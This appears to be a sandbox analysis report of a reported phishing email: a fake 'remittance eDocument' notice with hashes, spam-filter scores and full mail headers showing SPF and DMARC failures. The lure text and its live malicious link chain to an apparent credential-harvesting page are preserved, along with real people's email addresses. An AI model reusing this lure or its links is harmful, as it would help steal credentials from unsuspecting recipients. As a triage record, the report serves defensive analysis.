Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. O.c.t. .. 0.6. .. 2.0.2.3. .1.1.:.3.5.:.2.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e........................................ .W.S.C. .S.t.a.t.e. .I.n.f.o. ................................................................. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. ..............................d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

File type:	RFC 822 mail, ASCII text, with very long lines (347), with CRLF line terminators
Entropy (8bit):	6.106581030553231
TrID:	E-Mail message (Var. 5) (54515/1) 100.00%
File name:	phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.eml
File size:	43'591 bytes
MD5:	845e539d744aa9d873fcc78322e23aab
SHA1:	1a4f474055762a0e8aaed2262e185d0742bcc7e3
SHA256:	7f25bc02b8648f3ed9a3597d965ec56801f2e0a5735498f900e3a517b6294b0e
SHA512:	201e21a3df73933956659efda5c2508fc854df36c38b3322bc239d99c10f6ae5eac456c8ff4ee69933687ff4155497e519dcc2f91b2b595bcc34d9a3b98cc0cb
SSDEEP:	768:vjDS6JTx7xHWzvv/CNiBgXQkaVAjBvnaAgeY7NCibJSDiqbKYlvSEbqZ:vjlP7xHWzvv/Ai6Xi4aABA/SD/1SEbqZ
TLSH:	4D136CCBA90510A9F73101C8AF04BBCCA759BEDEEEE4E8E5720623338D4743252557DA
File Content Preview:	Received: from SJ0PR22MB3851.namprd22.prod.outlook.com.. (2603:10b6:a03:4ea::9) by SN4PR22MB2854.namprd22.prod.outlook.com with.. HTTPS; Fri, 17 Jan 2025 17:15:52 +0000..ARC-Seal: i=2; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=pass;.. b=v1aY6R

Subject:	Completed: Please Review Remittance eDocument_PrintScan_1962.pdf
From:	Daniel Wintner <danielw@thearbagroup.com>
To:	Daniel Wintner <danielw@thearbagroup.com>
Cc:
BCC:
Date:	Thu, 16 Jan 2025 04:57:06 -0800
Communications:	[EXTERNAL EMAIL: Take caution with links and attachments. ] Your eDocument is ready. Hi user, Please find remittance for the payment processed on January 16, 2024 by clicking this button: Review Document <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=5f30d80bfc49ccfd2ec3457f652892e61ef725c0> Or copy/paste this link to your browser: ________________________________ Questions? Simply reply to this email. {udomain} Service Desk \| 1-888-250-8971 <tel:1-888-250-8971> \| [email} \| Twitter <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.OwzZc87aARPCaEzPsO5TaRb9yVbN1LzKEIQlDyEjylkVPzMYc3hK1lyhY9U9JnsQI-3O_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBNI2A4KlXhqqJBCUplnq34p-2FcBNm2geGffl0AeKkj3nzkX-2By-2F7ULa0U98312nMznQrHBcReplzwLpk1ZEKg93MJ90rVAf4Auq3iaqEZmipp7VgYfvFD4Lq9BuZBkITnFjQ52ZbFtcU9lGu5yWcy1MQp&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=916f0593958ddb61a38518ccb443ae58be2b8c31> \| Facebook <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.zi5jYUxwJ-2B9g-2BhxDwu5-2Fkg09RC6nUlgZPSzVUHUPncyB3NtX3MkMm6cz-2B4VhiW2Uz3FY_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBNk-2BEx2PFei6Rl1NW4O5lSAs95M04Llyfi4dru2VAxx8RxdYgvoA1i8KQGE6SX7mKuv2BbmON5xM2azf8weVYwVmEeZZbEBPxZHvi9R3eC0drcXGnQpX18UaTfqh5K8sLUZlFugtBPI4YC-2BuolKdQT7&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=c49349e144376cc635ca69cc18b09078cd1ac29e> \| Blog <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.Mx4SSLZxEU2WaKO7j3r6LAnl1AejIR76oSNxAG2MeUyfzCWuK-2BZ1VvUF1Zc5pE6aoNrF_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBPYPIBJGHD22nct74mjZumCFJIP-2FvqcMfn9Np5sERDWNN6YE8VjBGUKN2td2HYXP6v0o3puyUErhuDXEGXIcZY9U-2BJnRFtRI0v7PzATd-2ByLAlcKcASOLRrTIj2fnKKjMe9thkaXkoumqaX5s-2F4r4z3Z&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=31c5b18d17575c0bd4e5219f82d813a92eb63209> \| LinkedIn <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.zi5jYUxwJ-2B9g-2BhxDwu5-2Fkvfd7bbSAHKuVjmml4JtHch75zvI3AduhX4mF-2Brg0jOnOn2I5XU5or9ZaebSEGgvKw-3D-3DKDth_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBOrUVvGMl-2FXLzauFQtT0YawPD8TPivKOxi-2B1fZDCX4T3uMjpMiaojbnCYTMz05cFxrQLlNYce8LzT8QxukiKkCMcy1gt4BU9s-2FsBZ6Zobc1Atsbo7BkpCji4v-2FRGzw2noMwiDIjegSOz-2B1-2FIlHQhsSh&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=3676b21f3ef86fe8dedba98dd7d7ae22ebda4b11> /p> <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.J8Wm48ULAAoyNaFSLnBTkBm4sicnBWaW9HD5lj5GfNZ3QWvFVe-2B0-2BsUngdr8JkMlsJNHkNzXpBmRCAq5b7U3Y33aAIF9ggEFFEWP7a9hnNw-3D7yhA_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBNOdvMy0NAKf6w06dOD4HyRi87WaaWRXCJ8-2FPIZidN8MQwVZk6hDa7IHXiXpupRbauYYDic9g7PNeX2R2AXRZQzAtcLEZxFA1Qzh80eppmWw20EZKTGXmrjH57lUr9E6ZOk492UStIbUnW-2FCM6aefdw&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=1c12c42022b3da2fb1fe558d24e616710485f92f> <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.WSOZBAs3f8-2Fr7dgg-2BW6eyWFsuGZzDVnTr57ADPNZe-2FQjuj-2BhGK7F59uSPoZpjqdo9yheb6-2Bhj5KZlr2hUdrhrQBHowbcNrU9HA7h6j2meHHlfPLNZZN6NDYapPMEIfMwH6AD5-2F1D2xOC3jZYDTFeOEgM-2BS1Dt50nCB8NJCfVxm2SsFVDJnW8oQ1UIJ-2F-2F-2FclErHdv2gtOF6omsZLOwcnndw-3D-3D201e_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBMVNvlAruzDNoVGFuiM71uan5dkaeLqUJU8-2BFY6RDDVaCv1Nldwl5c3FwaexObNcUktRzywIFrlPjOGSY21vtaL2shZlvixlA1hDslubJk041pg4ctQIj1wFky82rYFtVq7T4YHf8zGTlTO6sxWCSO6&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=eb533936ec2b24219e63b98e8c27668b3214c046> Disclaimer: We have reviewed the contract for insurance purposes only. We are not in a position to provide legal advice, and thus our review is based on coverage in force at the time of the review. The comments made in this review are not intended to be a substitute for a review of the contract by your companys legal counsel and accordingly, it is recommended that your counsel review this contract. We disclaim any and all liabilities arising from this review and any final contract language. As governed by insurance law in all states, a Certificate of Insurance cannot extend or alter coverage provided in an insurance policy in any way. Policy rights and conditions can only be extended through the policies and endorsements. To comply with state regulations and ACORD standards, our company policy is to provide copies of the actual forms contained within the evidenced policies to those that request them. Along these lines, what is stated in the Description of Operations is solely and strictly based on information provided to this agency by the named insured. https://clicktime.cloud.postoffice.net/clicktime.php?U=https://scenvironmental.samanage.com/activate/eyJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImNoZXJ5bEBzY2Vudmlyb25tZW50YWwuY2EiLCJhY2NvdW50IjpudWxsLCJleHBpcmVkIjoiMjAyNC0xMS0wOSAwMDozOTo0MSBVVEMifQ._ZQP-byL-c3t1ArY7HeMzKmTxR1K-dUoXlrjHqecX0o&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=dc52b503f0a0af8f13bcd3011c97d468b89ee35b <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.HF-2F4tkZ5BkdRwB973UOuNU83PyGZPZGgev8MG9MROkYKLlzq6dYbFIQ0Wp6-2FVOqitUz4KJ44JaY7-2FJ6x9a1NuuQI4gtcFBkpNfqIyb2tcmk3ghcwPyH4xxczxqNh07TBcw2bN0NpkqQ1FtrEfJeo-2FDBichJe82LIWW0kQL2M-2F6AxWMpBDawaaL0hUuLzPsRop3rAwy1WquPKYsXp-2FMTckqEHWNsYnqbuTAWWorwRfjiQ7-2FeiNiMIMv0AdJgg3b3Vz6Atlo6US0kEMREAFWZiAQHn7BrHXnCJFC7Rb8IWwXHTxXMBIPCDL8Ug9Nwn74Vyb94U_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBPIwOHq4vI-2FpxeP-2FlP-2BoxMVFBgMnFDdV1PmPLpD8DuYSF4JnPAa1rcDKd7Jij2Q7Py3pz8YsYwOcrJBJbUx14AIxTjLJuhHjyzPZialD5u-2FRjfG9GqhGW-2B2yeXEQfZ0QxfYUOdBsLrCB9QoQfj2PHni&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=b86cbb914efff989efa37569dcdd9425495ebfa9>
Attachments:

Key	Value
Received	Fri, 17 Jan 2025 09:15:52 -0800
ARC-Seal	i=1; a=rsa-sha256; d=silversky.com; s=silversky-20150623192408; t=1737134144; cv=none; b=MarduS8a4VTRMJlxRvuozPLvYfov6LPyitCgIl1d0h1QORdEld3Jt3/KEZdWT1OKxgxqDzpMpIU8Qu1IReNDk5pIcdWLrOzJ6WhtjEdbCJ9LPYm8XJOZfHggqN7BDN9ePbaW8K1tXyfkTfb+MyJT9IqSeKcRNFhMDUKMdKxv628=
ARC-Message-Signature	i=1; a=rsa-sha256; d=silversky.com; s=silversky-20150623192408; t=1737134144; c=relaxed/simple; bh=BfYivrErTN673SviLOj9GwpyEUgeubhrafjKckPA7fY=; h=From:To:Subject:Date; b=CEBhxHDW8xQzPJZdpnqoCLAG5fivLqIQDCLJuEJl/d9k8EUlMhVZBAeAcOjFgL25kA9JBU8CkeP5pwlViTU13LFIBUL05f5qSjH7RpvFHw0WfWBs+dT2k2eZIcu5tOEdu5I3WKfsQKqtZ2vtXfIFr7V7Zk32vGZeENH4WFNMv3M=
ARC-Authentication-Results	i=1; gwsin.silversky.com; dmarc=pass policy.dmarc=none header.from=thearbagroup.com; dkim=none; spf=pass smtp.mailfrom=thearbagroup.com; arc=none smtp.remote-ip=206.117.240.236
authentication-results	spf=softfail (sender IP is 165.212.64.87) smtp.mailfrom=thearbagroup.com; dkim=none (message not signed) header.d=none;dmarc=fail action=quarantine header.from=thearbagroup.com;compauth=none reason=451
received-spf	SoftFail (protection.outlook.com: domain of transitioning thearbagroup.com discourages use of 165.212.64.87 as permitted sender)
X-USANET-Received	from emd1.mbox.net [165.212.64.8] by gws2.mbox.net via mtad (C8.MAIN.4.26U) with ESMTP id 700daPm6J5824Ms2; Thu, 16 Jan 2025 12:57:09 -0000
X-USANET-TAP-Score	1
X-BAEAI-Quarantine-Release-Spam_AV-User	unknown
Authentication-Results-Original	gwsin.silversky.com; dmarc=pass policy.dmarc=none header.from=thearbagroup.com; dkim=none; spf=pass smtp.mailfrom=thearbagroup.com; arc=none smtp.remote-ip=206.117.240.236
X-USANET-Routed	100 IN-RELAY R:gwsin-int:625
X-USANET-GWS2-Service	gwsdin-tap preclick-never
X-USANET-GWS2-Tenant	firstfedweb.com
X-USANET-GWS2-Tagid	FF1001
X-USANET-GWS2-MailFromDnsResult	DnsFound
X-USANET-GWS2-Security	TLSv1.2;ECDHE-RSA-AES256-GCM-SHA384
X-USANET-Source	206.117.240.236 IN danielw@thearbagroup.com email.shadik.com TLS
X-USANET-MsgId	XID252daPm6J6574Xd1
X-BAEAI-Trust-Score	68
X-BAEAI-Trust-Reasons	SNDRAUTH; RCPTFRG; SNDRNEW; DOMRARE,thearbagroup.com; RCPTVIP;
Thread-Topic	Completed: Please Review Remittance eDocument_PrintScan_1962.pdf
Thread-Index	AdtoFiMGEXgsfGB5RJyzzcNg8LUmRA==
Accept-Language	en-US
Content-Language	en-US
X-MS-Has-Attach
X-MS-TNEF-Correlator
x-originating-ip	[40.90.192.170]
x-c2processedorg	6ba02b50-3656-4919-9ee0-45af6749a9ca
X-USANET-SpamC	spam
X-Cloudmark-Tracker	v=2.4 cv=ca4ZrWDM c=1 sm=1 tr=0 ts=67890227 cx=a_idp_d p=3UBLnPBwAAAA:8 p=g5BPWuElaEEA:10 p=CRjS4uKKONYdHZD0mRKQ:22 p=QhnmdGnfZl10ibMM-eB4:22 a=Th71IOv2UKEFLIUO3xxeAg==:117 a=Th71IOv2UKEFLIUO3xxeAg==:17 a=xqWC_Br6kY4A:10 a=tcnJUJiHlNUA:10 a=VdSt8ZQiCzkA:10 a=t2fj5NrpAAAA:8 a=_kqLnAfwAAAA:8 a=WXGgB6l3AAAA:8 a=aiZQwZ7oDF895FkjcFQA:9 a=CjuIK1q_8ugA:10 a=-FEs8UIgK8oA:10 a=VtUAnezVAAAA:8 a=1RHby_vtIKSzhqZgslMA:9 a=gfOAcnMd3sy0UEYc:21 a=_W_S_7VecoQA:10 a=lqcHg5cX4UMA:10 a=Ko-jbQXUCB6ArCsYEnw1:22 a=bsUo9Tuum60ilkPOD17d:22 a=_DLPDHIXDY4eC_hEUbMI:22 a=S39TjSYE69Kti-02AJUr:22 a=d65IBo_BBUZJjnZkANmL:22 a=Wek7A-RUP7zhWJvFAREr:22 a=wGdmxXhPVLjtJH5WJGV8:22 a=9kjMlTncOCrqFGt6ogWR:22 a=8D53uu4iJqLOlrRWd67z:22 a=gnbZQBmExIAN499Zi1tb:22 a=ZOJjtUtsIznJmQ7qIUeP:22 a=udIrqqGTqgLI_nlrwCpK:22 a=4MmT0gk-9-J2g2A9bAwk:22 a=cPQSjfK2_nFv0Q5t_7PE:22 a=poXaRoVlC6wW9_mwW8W4:22 a=p-dnK0njbqwfn1k4-x12:22 a=P3fMaJMKd_wdyUQKDHwh:22 a=NWVoK91CQySWRX1oVYDe:22
X-LASED-Version	Antispam-Engine: 5.1.4, AntispamData: 2025.1.16.121546
X-LASED-SpamProbability	0.087066
X-LASED-Spam	NonSpam
X-LASED-Hits	BODYTEXTH_SIZE_3000_MORE 0.000000, BODY_SIZE_10000_PLUS 0.000000, FRAUD_X3 1.000000, FRAUD_X3_LARGE_BODY -1.000000, FROM_SAME_AS_TO 0.050000, FROM_SAME_AS_TO_DOMAIN 0.000000, HREF_LABEL_TEXT_NO_URI 0.000000, HREF_LABEL_TEXT_ONLY 0.000000, HTML_90_100 0.100000, HTML_FONT_INVISIBLE 0.100000, SENDER_NO_AUTH 0.000000, SUPERLONG_LINE 0.050000, WEBMAIL_SOURCE 0.000000, WEBMAIL_XOIP 0.000000, WEBMAIL_X_IP_HDR 0.000000, __ANY_URI 0.000000, __ATTACH_CTE_QUOTED_PRINTABLE 0.000000, __BODY_TEXT_X4 0.000000, __BUSINESS_SIGNATURE 0.000000, __CP_URI_IN_BODY 0.000000, __CT 0.000000, __CTYPE_HAS_BOUNDARY 0.000000, __CTYPE_MULTIPART 0.000000, __CTYPE_MULTIPART_ALT 0.000000, __EXCESSIVE_NEWLINES 0.000000, __FRAUD_COMMON 0.000000, __FRAUD_CONTACT_NUM 0.000000, __FRAUD_INTRO 0.000000, __FRAUD_PARTNERSHIP 0.000000, __FRAUD_REPLY 0.000000, __FROM_ADDY_SHORT_LC 0.000000, __FROM_DOMAIN_IN_ANY_TO1 0.000000, __FROM_DOMAIN_NOT_IN_BODY 0.000000, __FROM_NAME_NOT_IN_BODY 0.000000, __FUR_HEADER 0.000000, __HAS_FROM 0.000000, __HAS_HTML 0.000000, __HAS_MSGID 0.000000, __HAS_XOIP 0.000000, __HREF_LABEL_PHISH 0.000000, __HREF_LABEL_TEXT 0.000000, __HTML_AHREF_TAG 0.000000, __HTML_BAD_END 0.000000, __HTML_BOLD 0.000000, __HTML_HREF_TAG_X2 0.000000, __HTML_TAG_CENTER 0.000000, __HTML_TAG_DIV 0.000000, __HTML_TAG_TABLE 0.000000, __HTTPS_URI 0.000000, __IMG_THEN_TEXT 0.000000, __INVOICE_MULTILINGUAL 0.000000, __MIME_HTML 0.000000, __MIME_TEXT_H 0.000000, __MIME_TEXT_H1 0.000000, __MIME_TEXT_H2 0.000000, __MIME_TEXT_P 0.000000, __MIME_TEXT_P1 0.000000, __MIME_TEXT_P2 0.000000, __MIME_VERSION 0.000000, __MSGID_32HEX 0.000000, __MULTIPLE_URI_HTML 0.000000, __MULTIPLE_URI_TEXT 0.000000, __PART_TYPE_HTML 0.000000, __PHISH_PHRASE10 0.000000, __PHISH_SPEAR_GREETING 0.000000, __RCVD_FROM_HOMEUSER 0.000000, __SANE_MSGID 0.000000, __STOCK_CRUFT 0.000000, __SUBJ_ENDS_IN_FILE_EXT 0.000000, __TAG_EXISTS_BODY 0.000000, __TAG_EXISTS_HEAD 0.000000, __TAG_EXISTS_HTML 0.000000, __TAG_EXISTS_META 0.000000, __TOLL_FREE_PHONE_US 0.000000, __TO_DOMAIN_IN_FROM 0.000000, __TO_DOMAIN_IN_MSGID 0.000000, __TO_MALFORMED_2 0.000000, __TO_NAME 0.000000, __TO_NAME_DIFF_FROM_ACC 0.000000, __TO_REAL_NAMES 0.000000, __URI_CTA_NOT_DOCUSIGN2 0.000000, __URI_ENDS_IN_SLASH 0.000000, __URI_HAS_HYPHEN_USC 0.000000, __URI_IN_BODY 0.000000, __URI_IN_BODY_HTTP_X10 0.000000, __URI_MAILTO 0.000000, __URI_NOT_IMG 0.000000, __URI_NO_WWW 0.000000, __URI_NS 0.000000, __URI_TEL 0.000000, __URI_WITHOUT_PATH 0.000000, __URI_WITH_PATH 0.000000
X-LASED-Impersonation	False
X-Sophos-Tracker	0.087066 b7819f385761e4ed4e992346049d74f52ef498b2
X-BAEAI-Source-GeoIP	"US" "N/A" "N/A"
X-BAEAI-SPF	PASS
X-BAEAI-DKIM	NONE
X-BAEAI-DMARC	pass
X-SilverSky-ARC	none
X-BAEAI-Authentication-Rating	strong
X-BAEAI-Trust-Level	green
Return-Path	danielw@thearbagroup.com
X-MS-Exchange-Organization-ExpirationStartTime	17 Jan 2025 17:15:45.4487 (UTC)
X-MS-Exchange-Organization-ExpirationStartTimeReason	OriginalSubmit
X-MS-Exchange-Organization-ExpirationInterval	1:00:00:00.0000000
X-MS-Exchange-Organization-ExpirationIntervalReason	OriginalSubmit
X-MS-Exchange-Organization-Network-Message-Id	1fdd664b-7e99-4473-2e0f-08dd371a9460
X-EOPAttributedMessage	0
X-EOPTenantAttributedMessage	3778f0b2-789a-4d43-b25e-d4fe25a4c3c0:0
X-MS-Exchange-Organization-MessageDirectionality	Incoming
x-ms-publictraffictype	Email
X-MS-TrafficTypeDiagnostic	BL6PEPF0001AB71:EE_\|SJ0PR22MB3851:EE_\|SN4PR22MB2854:EE_
x-ms-exchange-organization-authsource	BL6PEPF0001AB71.namprd02.prod.outlook.com
x-ms-exchange-organization-authas	Anonymous
X-MS-Office365-Filtering-Correlation-Id	1fdd664b-7e99-4473-2e0f-08dd371a9460
X-MS-Exchange-AtpMessageProperties	SA\|SL
X-MS-Exchange-Organization-SCL	-1
X-MS-Exchange-Organization-BypassClutter	$true
X-Microsoft-Antispam	BCL:0;ARA:13230040\|82310400026\|5073199012\|12012899012\|5063199012\|8096899003;
x-forefront-antispam-report	CIP:165.212.64.87;CTRY:US;LANG:en;SCL:-1;SRV:;IPV:NLI;SFV:NSPM;H:postin03.mbox.net;PTR:postin03.mbox.net;CAT:NONE;SFS:(13230040)(82310400026)(5073199012)(12012899012)(5063199012)(8096899003);DIR:INB;
X-MS-Exchange-CrossTenant-OriginalArrivalTime	17 Jan 2025 17:15:45.2299 (UTC)
X-MS-Exchange-CrossTenant-Network-Message-Id	1fdd664b-7e99-4473-2e0f-08dd371a9460
X-MS-Exchange-CrossTenant-Id	3778f0b2-789a-4d43-b25e-d4fe25a4c3c0
X-MS-Exchange-CrossTenant-AuthSource	BL6PEPF0001AB71.namprd02.prod.outlook.com
X-MS-Exchange-CrossTenant-AuthAs	Anonymous
X-MS-Exchange-CrossTenant-FromEntityHeader	Internet
X-MS-Exchange-Transport-CrossTenantHeadersStamped	SJ0PR22MB3851
X-MS-Exchange-Transport-EndToEndLatency	00:00:06.8944390
X-MS-Exchange-Processed-By-BccFoldering	15.20.8356.008
X-Microsoft-Antispam-Mailbox-Delivery	ucf:0;jmr:0;auth:0;dest:I;ENG:(910001)(944506478)(944626604)(920097)(930097)(140003);
X-Microsoft-Antispam-Message-Info	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